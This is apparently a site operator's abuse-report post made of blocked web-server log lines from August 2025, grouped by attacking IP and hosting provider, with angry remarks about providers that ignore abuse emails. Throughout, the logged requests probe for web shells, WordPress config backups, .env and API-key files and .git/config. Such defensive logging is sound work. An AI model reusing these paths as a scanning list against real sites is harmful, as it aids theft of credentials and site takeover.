34.122.216.213 website*x.com – – [30/Aug/2025:00:52:13 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.122.216.213 website*x.com – – [30/Aug/2025:00:52:13 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.122.216.213 website*x.com – – [30/Aug/2025:00:52:13 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.122.216.213 website*x.com – – [30/Aug/2025:00:52:13 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:22 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:22 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:24 +0200] „GET /NewFile.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:25 +0200] „GET /dejavu.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:25 +0200] „GET /bugz.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:26 +0200] „GET /first.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:27 +0200] „GET /page.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:27 +0200] „GET /data.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:28 +0200] „GET /alfa.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:28 +0200] „GET /ss.php HTTP/1.0“ 403 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:29 +0200] „GET /h.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:29 +0200] „GET /hi.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:30 +0200] „GET /ini.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:30 +0200] „GET /faq.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:31 +0200] „GET /elp.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:32 +0200] „GET /erin1.PhP7 HTTP/1.0“ 403 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:32 +0200] „GET /astab.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:32 +0200] „GET /Njima.php HTTP/1.0“ 302 – „-“ „-“
20.39.205.73 website*x.com – – [30/Aug/2025:02:05:33 +0200] „GET /packed.php HTTP/1.0“ 302 – „-“ „-“
AS214209 – Internet Magnate (Pty) Ltd – AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
reports@magnates.co.za – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
94.156.152.52 website*x.com – – [30/Aug/2025:07:54:59 +0200] „GET / HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
94.156.152.52 website*x.com – – [30/Aug/2025:07:54:59 +0200] „GET / HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
94.156.152.52 website*x.com – – [30/Aug/2025:07:54:59 +0200] „GET //doiconvs.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
94.156.152.52 website*x.com – – [30/Aug/2025:07:54:59 +0200] „GET //doiconvs.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“

MAIL NR. 5 TODAY!
hwssecurity@huaweicloud.com,abuse@luxvps.xyz,abuse@ovh.net
AS136907 – HUAWEI CLOUDS – AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hwssecurity@huaweicloud.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
114.119.148.88 www.website*x.de – – [30/Aug/2025:04:55:44 +0200] „GET /wp-login.php?action=lostpassword HTTP/1.0“ 403 – „http://www.website*x.de/wp-login.php“ „Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)“
114.119.148.88 www.website*x.de – – [30/Aug/2025:08:17:21 +0200] „GET /author/admin?amp=1 HTTP/1.0“ 403 – „http://www.website*x.de/author/admin“ „Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)“
AS58087 – Florian Kolb – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@luxvps.xyz – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:04 +0200] „GET /wp-config.php_org HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:04 +0200] „GET /wp-configold.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:05 +0200] „GET /wp-config.php-org HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:05 +0200] „GET /wp-config-1.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:06 +0200] „GET /wp-config.php-original HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:07 +0200] „GET /wp-config-0.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:07 +0200] „GET /wp-config-2.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:08 +0200] „GET /wp-config-3.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:08 +0200] „GET /wp-config-4.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:09 +0200] „GET /wp-config-5.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:09 +0200] „GET /wp-config-6.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:10 +0200] „GET /wp-config-7.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:11 +0200] „GET /wp-config-8.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
45.13.225.78 www.website*x.de – – [30/Aug/2025:07:34:11 +0200] „GET /wp-config-9.php-bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15“
AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ALWAYS ANSWERED ABOUT OUR ABUSE EMAILS! THIS IS VERY GOOD!
51.75.157.203 www.website*x.de – – [30/Aug/2025:10:14:53 +0200] „GET /wp-content/themes/classwithtostring.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.75.157.203 www.website*x.de – – [30/Aug/2025:10:14:53 +0200] „GET /assets/images/accesson.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

MAIL NR. 6 TODAY!
admin@frantech.ca, abuse@ca.leaseweb.com,abuse@hostglobal.plus, sales@hostglobal.plus, info@hostglobal.plus
AS53667 – FranTech Solutions – AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@frantech.ca – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
107.189.3.47 www.website*x.com – – [30/Aug/2025:07:26:17 +0200] „GET /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
AS32613 – Leaseweb Canada Inc.
abuse@ca.leaseweb.com
135.225.113.94 www.website*x.com – – [31/Aug/2025:08:03:13 +0200] „GET /cgi-bin/xmrlpc.php HTTP/1.0“ 404 16 „-“ „-“
135.225.113.94 www.website*x.com – – [31/Aug/2025:08:03:13 +0200] „GET /404.php HTTP/1.0“ 302 – „-“ „-“
AS202306 – HOSTGLOBAL.PLUS LTD – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hostglobal.plus – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:40 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:40 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 4.4.2; GT-N8000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.92967“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:40 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:41 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 OPR/47.0.2631.80“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:41 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.02“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:41 +0200] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:41 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 4.1.2; GT-N8013 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:41 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:41 +0200] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C)“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:42 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.4 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.4“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:42 +0200] „GET /phpinfo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; yie10)“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:43 +0200] „GET /dev/.env HTTP/1.0“ 403 – „-“ „Opera/9.80 (Linux armv7l; HbbTV/1.1.1 (; Philips; ; ; PHILIPSTV; ) CE-HTML/1.0 NETTV/4.3.2 PHILIPSTV/2.1.1 Firmware/003.010.000.001 (PhilipsTV, 2.1.1,) en) Presto/2.12.362 Version/12.11“
78.153.140.218 www.website*x.com – – [31/Aug/2025:10:30:43 +0200] „GET /app_dev.php/_profiler/phpinfo HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36“
43.143.248.236 www.website*x.com – – [31/Aug/2025:10:44:44 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“
44.251.240.106 www.website*x.com – – [31/Aug/2025:10:50:07 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“

MAIL NR. 7 TODAY!
dmzhostabuse@gmail.com,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,google-cloud-compliance@google.com, network-abuse@google.com
AS48090 – TECHOFF SRV LIMITED – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
dmzhostabuse@gmail.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
93.123.109.7 website*x.com – – [30/Aug/2025:02:46:12 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141×19)“
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
HERE WITH 2 IP´S! – VERY UNSECURE PROVIDER!!!
52.187.133.213 website*x.com – – [30/Aug/2025:05:06:58 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:06:58 +0200] „GET /CLA.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:01 +0200] „GET /gfile.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:02 +0200] „GET /aua.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:02 +0200] „GET /Sanskrit.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:03 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:04 +0200] „GET /great.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:04 +0200] „GET /class9.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:05 +0200] „GET /pass.php HTTP/1.0“ 403 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:05 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:06 +0200] „GET /ot.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:07 +0200] „GET /witmm.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:08 +0200] „GET /lo.php HTTP/1.0“ 302 – „-“ „-“
52.187.133.213 website*x.com – – [30/Aug/2025:05:07:09 +0200] „GET /asd67.php HTTP/1.0“ 302 – „-“ „-“
+
52.230.8.90 website*x.com – – [30/Aug/2025:09:14:53 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:14:53 +0200] „GET /dejavu.php HTTP/1.0“ 302 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:15:08 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:15:23 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:15:38 +0200] „GET /.trash7309/index.php HTTP/1.0“ 403 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:15:39 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:15:54 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:16:09 +0200] „GET /NewFile.php HTTP/1.0“ 302 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:16:24 +0200] „GET /wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:16:39 +0200] „GET /bless.php HTTP/1.0“ 403 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:16:50 +0200] „GET /wp-admin/wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:17:05 +0200] „GET /404.php HTTP/1.0“ 302 – „-“ „-“
52.230.8.90 website*x.com – – [30/Aug/2025:09:17:20 +0200] „GET /ahax.php HTTP/1.0“ 302 – „-“ „-“
AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:51 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:51 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:51 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:52 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:52 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:52 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:52 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:52 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:53 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:53 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:53 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:53 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:53 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:53 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:54 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:54 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:54 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.58.95.213 website*x.com – – [30/Aug/2025:11:52:54 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“

MAIL NR. 8 TODAY!
abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse@cdn77.com,abuse@hostglobal.plus,sales@hostglobal.plus, info@hostglobal.plus
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
HERE WITH 2 IP´S! – VERY UNSECURE PROVIDER!!!
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:25 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:25 +0200] „GET /CLA.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:27 +0200] „GET /gfile.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:27 +0200] „GET /aua.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:28 +0200] „GET /Sanskrit.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:29 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:29 +0200] „GET /great.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:30 +0200] „GET /class9.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:30 +0200] „GET /pass.php HTTP/1.0“ 403 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:31 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:31 +0200] „GET /ot.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:32 +0200] „GET /witmm.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:32 +0200] „GET /lo.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.com – – [30/Aug/2025:03:12:33 +0200] „GET /asd67.php HTTP/1.0“ 302 – „-“ „-“
+
